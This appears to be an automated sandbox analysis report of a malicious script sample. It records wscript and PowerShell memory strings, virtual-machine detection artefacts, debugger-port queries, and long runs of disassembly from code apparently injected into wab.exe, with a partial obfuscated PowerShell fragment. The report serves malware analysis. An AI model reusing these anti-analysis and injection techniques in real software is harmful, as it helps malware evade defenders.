        Source: wscript.exe, 00000000.00000003.1587549677.0000023238C8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1470442461.0000023238C91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1471566026.0000023238C8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1589361392.0000023238CA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1589286696.0000023238C8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1479603781.0000023238C8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1470481390.0000023238C94000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1470823040.0000023238C91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: wscript.exe, 00000000.00000003.1587421505.0000023238BF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}D0t
        Source: powershell.exe, 00000003.00000002.2071733404.000001FCF597A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWoc%SystemRoot%\system32\mswsock.dllrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st promeFlambrS.orvsI for.PrkenHColoneSpindagal.iduns
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\openfiles.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_02B8D8BC LdrInitializeThunk,LdrInitializeThunk,9_2_02B8D8BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020A020 mov eax, dword ptr fs:[00000030h]12_2_2020A020
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020C020 mov eax, dword ptr fs:[00000030h]12_2_2020C020
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D903E mov eax, dword ptr fs:[00000030h]12_2_202D903E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022E016 mov eax, dword ptr fs:[00000030h]12_2_2022E016
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E5060 mov eax, dword ptr fs:[00000030h]12_2_202E5060
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023C073 mov eax, dword ptr fs:[00000030h]12_2_2023C073
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20221070 mov eax, dword ptr fs:[00000030h]12_2_20221070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20221070 mov ecx, dword ptr fs:[00000030h]12_2_20221070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2028D070 mov ecx, dword ptr fs:[00000030h]12_2_2028D070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20212050 mov eax, dword ptr fs:[00000030h]12_2_20212050
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023B052 mov eax, dword ptr fs:[00000030h]12_2_2023B052
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202B705E mov ebx, dword ptr fs:[00000030h]12_2_202B705E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202B705E mov eax, dword ptr fs:[00000030h]12_2_202B705E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D60B8 mov eax, dword ptr fs:[00000030h]12_2_202D60B8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D60B8 mov ecx, dword ptr fs:[00000030h]12_2_202D60B8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021208A mov eax, dword ptr fs:[00000030h]12_2_2021208A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020D08D mov eax, dword ptr fs:[00000030h]12_2_2020D08D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023D090 mov eax, dword ptr fs:[00000030h]12_2_2023D090
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20215096 mov eax, dword ptr fs:[00000030h]12_2_20215096
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024909C mov eax, dword ptr fs:[00000030h]12_2_2024909C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020A0E3 mov ecx, dword ptr fs:[00000030h]12_2_2020A0E3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202350E4 mov eax, dword ptr fs:[00000030h]12_2_202350E4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202350E4 mov ecx, dword ptr fs:[00000030h]12_2_202350E4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202180E9 mov eax, dword ptr fs:[00000030h]12_2_202180E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020C0F0 mov eax, dword ptr fs:[00000030h]12_2_2020C0F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202520F0 mov ecx, dword ptr fs:[00000030h]12_2_202520F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202270C0 mov eax, dword ptr fs:[00000030h]12_2_202270C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202270C0 mov ecx, dword ptr fs:[00000030h]12_2_202270C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2028D0C0 mov eax, dword ptr fs:[00000030h]12_2_2028D0C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202920DE mov eax, dword ptr fs:[00000030h]12_2_202920DE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E50D9 mov eax, dword ptr fs:[00000030h]12_2_202E50D9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202390DB mov eax, dword ptr fs:[00000030h]12_2_202390DB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20240124 mov eax, dword ptr fs:[00000030h]12_2_20240124
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20211131 mov eax, dword ptr fs:[00000030h]12_2_20211131
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020B136 mov eax, dword ptr fs:[00000030h]12_2_2020B136
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202BA118 mov ecx, dword ptr fs:[00000030h]12_2_202BA118
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202BA118 mov eax, dword ptr fs:[00000030h]12_2_202BA118
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D0115 mov eax, dword ptr fs:[00000030h]12_2_202D0115
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020F172 mov eax, dword ptr fs:[00000030h]12_2_2020F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A9179 mov eax, dword ptr fs:[00000030h]12_2_202A9179
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20209148 mov eax, dword ptr fs:[00000030h]12_2_20209148
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20209148 mov eax, dword ptr fs:[00000030h]12_2_20209148
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20209148 mov eax, dword ptr fs:[00000030h]12_2_20209148
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20209148 mov eax, dword ptr fs:[00000030h]12_2_20209148
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A4144 mov eax, dword ptr fs:[00000030h]12_2_202A4144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A4144 mov eax, dword ptr fs:[00000030h]12_2_202A4144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A4144 mov ecx, dword ptr fs:[00000030h]12_2_202A4144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A4144 mov eax, dword ptr fs:[00000030h]12_2_202A4144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A4144 mov eax, dword ptr fs:[00000030h]12_2_202A4144
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20217152 mov eax, dword ptr fs:[00000030h]12_2_20217152
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20216154 mov eax, dword ptr fs:[00000030h]12_2_20216154
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20216154 mov eax, dword ptr fs:[00000030h]12_2_20216154
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020C156 mov eax, dword ptr fs:[00000030h]12_2_2020C156
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E5152 mov eax, dword ptr fs:[00000030h]12_2_202E5152
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C11A4 mov eax, dword ptr fs:[00000030h]12_2_202C11A4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C11A4 mov eax, dword ptr fs:[00000030h]12_2_202C11A4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C11A4 mov eax, dword ptr fs:[00000030h]12_2_202C11A4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C11A4 mov eax, dword ptr fs:[00000030h]12_2_202C11A4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022B1B0 mov eax, dword ptr fs:[00000030h]12_2_2022B1B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20250185 mov eax, dword ptr fs:[00000030h]12_2_20250185
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202CC188 mov eax, dword ptr fs:[00000030h]12_2_202CC188
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202CC188 mov eax, dword ptr fs:[00000030h]12_2_202CC188
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029019F mov eax, dword ptr fs:[00000030h]12_2_2029019F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029019F mov eax, dword ptr fs:[00000030h]12_2_2029019F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029019F mov eax, dword ptr fs:[00000030h]12_2_2029019F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2029019F mov eax, dword ptr fs:[00000030h]12_2_2029019F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20267190 mov eax, dword ptr fs:[00000030h]12_2_20267190
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020A197 mov eax, dword ptr fs:[00000030h]12_2_2020A197
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020A197 mov eax, dword ptr fs:[00000030h]12_2_2020A197
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020A197 mov eax, dword ptr fs:[00000030h]12_2_2020A197
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E61E5 mov eax, dword ptr fs:[00000030h]12_2_202E61E5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202351EF mov eax, dword ptr fs:[00000030h]12_2_202351EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202151ED mov eax, dword ptr fs:[00000030h]12_2_202151ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202401F8 mov eax, dword ptr fs:[00000030h]12_2_202401F8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E51CB mov eax, dword ptr fs:[00000030h]12_2_202E51CB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D61C3 mov eax, dword ptr fs:[00000030h]12_2_202D61C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D61C3 mov eax, dword ptr fs:[00000030h]12_2_202D61C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024D1D0 mov eax, dword ptr fs:[00000030h]12_2_2024D1D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024D1D0 mov ecx, dword ptr fs:[00000030h]12_2_2024D1D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E5227 mov eax, dword ptr fs:[00000030h]12_2_202E5227
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020823B mov eax, dword ptr fs:[00000030h]12_2_2020823B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20247208 mov eax, dword ptr fs:[00000030h]12_2_20247208
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20247208 mov eax, dword ptr fs:[00000030h]12_2_20247208
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20214260 mov eax, dword ptr fs:[00000030h]12_2_20214260
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20214260 mov eax, dword ptr fs:[00000030h]12_2_20214260
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20214260 mov eax, dword ptr fs:[00000030h]12_2_20214260
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202DD26B mov eax, dword ptr fs:[00000030h]12_2_202DD26B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202DD26B mov eax, dword ptr fs:[00000030h]12_2_202DD26B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020826B mov eax, dword ptr fs:[00000030h]12_2_2020826B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20251270 mov eax, dword ptr fs:[00000030h]12_2_20251270
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20251270 mov eax, dword ptr fs:[00000030h]12_2_20251270
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20239274 mov eax, dword ptr fs:[00000030h]12_2_20239274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h]12_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h]12_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h]12_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h]12_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h]12_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h]12_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h]12_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h]12_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h]12_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h]12_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h]12_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0274 mov eax, dword ptr fs:[00000030h]12_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20209240 mov eax, dword ptr fs:[00000030h]12_2_20209240
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20209240 mov eax, dword ptr fs:[00000030h]12_2_20209240
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024724D mov eax, dword ptr fs:[00000030h]12_2_2024724D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020A250 mov eax, dword ptr fs:[00000030h]12_2_2020A250
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20216259 mov eax, dword ptr fs:[00000030h]12_2_20216259
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202CB256 mov eax, dword ptr fs:[00000030h]12_2_202CB256
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202CB256 mov eax, dword ptr fs:[00000030h]12_2_202CB256
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202202A0 mov eax, dword ptr fs:[00000030h]12_2_202202A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202202A0 mov eax, dword ptr fs:[00000030h]12_2_202202A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202252A0 mov eax, dword ptr fs:[00000030h]12_2_202252A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202252A0 mov eax, dword ptr fs:[00000030h]12_2_202252A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202252A0 mov eax, dword ptr fs:[00000030h]12_2_202252A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202252A0 mov eax, dword ptr fs:[00000030h]12_2_202252A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A72A0 mov eax, dword ptr fs:[00000030h]12_2_202A72A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A72A0 mov eax, dword ptr fs:[00000030h]12_2_202A72A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A62A0 mov eax, dword ptr fs:[00000030h]12_2_202A62A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A62A0 mov ecx, dword ptr fs:[00000030h]12_2_202A62A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A62A0 mov eax, dword ptr fs:[00000030h]12_2_202A62A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A62A0 mov eax, dword ptr fs:[00000030h]12_2_202A62A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A62A0 mov eax, dword ptr fs:[00000030h]12_2_202A62A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202A62A0 mov eax, dword ptr fs:[00000030h]12_2_202A62A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D92A6 mov eax, dword ptr fs:[00000030h]12_2_202D92A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D92A6 mov eax, dword ptr fs:[00000030h]12_2_202D92A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D92A6 mov eax, dword ptr fs:[00000030h]12_2_202D92A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D92A6 mov eax, dword ptr fs:[00000030h]12_2_202D92A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202992BC mov eax, dword ptr fs:[00000030h]12_2_202992BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202992BC mov eax, dword ptr fs:[00000030h]12_2_202992BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202992BC mov ecx, dword ptr fs:[00000030h]12_2_202992BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202992BC mov ecx, dword ptr fs:[00000030h]12_2_202992BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024E284 mov eax, dword ptr fs:[00000030h]12_2_2024E284
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024E284 mov eax, dword ptr fs:[00000030h]12_2_2024E284
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20290283 mov eax, dword ptr fs:[00000030h]12_2_20290283
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20290283 mov eax, dword ptr fs:[00000030h]12_2_20290283
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20290283 mov eax, dword ptr fs:[00000030h]12_2_20290283
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E5283 mov eax, dword ptr fs:[00000030h]12_2_202E5283
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024329E mov eax, dword ptr fs:[00000030h]12_2_2024329E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024329E mov eax, dword ptr fs:[00000030h]12_2_2024329E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED mov eax, dword ptr fs:[00000030h]12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202202E1 mov eax, dword ptr fs:[00000030h]12_2_202202E1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202202E1 mov eax, dword ptr fs:[00000030h]12_2_202202E1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202202E1 mov eax, dword ptr fs:[00000030h]12_2_202202E1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E52E2 mov eax, dword ptr fs:[00000030h]12_2_202E52E2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202CF2F8 mov eax, dword ptr fs:[00000030h]12_2_202CF2F8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202092FF mov eax, dword ptr fs:[00000030h]12_2_202092FF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021A2C3 mov eax, dword ptr fs:[00000030h]12_2_2021A2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021A2C3 mov eax, dword ptr fs:[00000030h]12_2_2021A2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021A2C3 mov eax, dword ptr fs:[00000030h]12_2_2021A2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021A2C3 mov eax, dword ptr fs:[00000030h]12_2_2021A2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021A2C3 mov eax, dword ptr fs:[00000030h]12_2_2021A2C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h]12_2_2023B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h]12_2_2023B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h]12_2_2023B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h]12_2_2023B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h]12_2_2023B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h]12_2_2023B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023B2C0 mov eax, dword ptr fs:[00000030h]12_2_2023B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202192C5 mov eax, dword ptr fs:[00000030h]12_2_202192C5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202192C5 mov eax, dword ptr fs:[00000030h]12_2_202192C5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023F2D0 mov eax, dword ptr fs:[00000030h]12_2_2023F2D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023F2D0 mov eax, dword ptr fs:[00000030h]12_2_2023F2D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020B2D3 mov eax, dword ptr fs:[00000030h]12_2_2020B2D3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020B2D3 mov eax, dword ptr fs:[00000030h]12_2_2020B2D3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020B2D3 mov eax, dword ptr fs:[00000030h]12_2_2020B2D3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D132D mov eax, dword ptr fs:[00000030h]12_2_202D132D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D132D mov eax, dword ptr fs:[00000030h]12_2_202D132D
